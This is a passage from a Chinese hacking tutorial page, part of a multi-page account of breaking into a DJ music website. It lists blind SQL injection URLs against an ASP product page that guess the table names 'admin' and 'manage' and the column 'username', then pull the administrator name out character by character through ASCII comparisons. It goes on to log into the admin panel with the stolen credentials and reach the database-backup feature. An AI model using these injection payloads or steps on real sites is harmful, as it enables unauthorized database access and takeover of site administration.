WEB开发网
开发学院网络安全安全技术 瞧!我是怎样轻轻松松入侵你DJ 阅读

瞧!我是怎样轻轻松松入侵你DJ

 2008-12-23 13:45:02 来源:WEB开发网   
核心提示: 正常,也就是图4,瞧!我是怎样轻轻松松入侵你DJ(2),说明不存在admin这个表,/productsview2.asp?id=248 or exists(select * from manage) //页面返回异常了,html备份限制的突破用明小子跑了下后台,如图5图5用注入得到的用户密

正常,也就是图4,说明不存在admin这个表。

/productsview2.asp?id=248 or exists(select * from manage) //页面返回异常了,也就是图3,说明存在manage这个表。猜完表后就要猜解字段了。

/productsview2.asp?id=248 or exists(select username from manage) //返回异常页面了,说明manage这个表中含有username这个字段,这时我们就可以猜数据了。

/productsview2.asp?id=248 or (select top 1 asc(mid(username,1,1)) form. manage)<123 //判断manage表中username字段的第一条数据的第一个字符的ascii值是否小于123,提交后发现返回异常页面。

/productsview2.asp?id=248 or (select top 1 asc(mid(username,1,1)) form. manage)>96 //提交后发现返回异常页面,得到第一个字符的ascii值范围在97-122之间,也就是在字母a-z之间,再慢慢缩小猜解的范围直到猜解出来用牛族多功能ASCII转换工具转换一下就可以得到管理员用户名的第一个字符了。需要猜解第二位的时候把上面语句改为mid(username,2,1),第三位mid(username,3,1)……如此类推。经过一番努力,得到username字段的第一条数据的ASCII值为97 100 109 105 110,转换得出字符串为admin。猜解完用户名还需要猜解密码,先猜字符再猜数据。

html备份限制的突破

用明小子跑了下后台,如图5

瞧!我是怎样轻轻松松入侵你DJ

图5

用注入得到的用户密码登陆后台,逛了一圈之后发现有备份数据库的地方,如图6

瞧!我是怎样轻轻松松入侵你DJ

上一页  1 2 3 4 5 6  下一页

Tags:怎样 轻轻松松 入侵

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接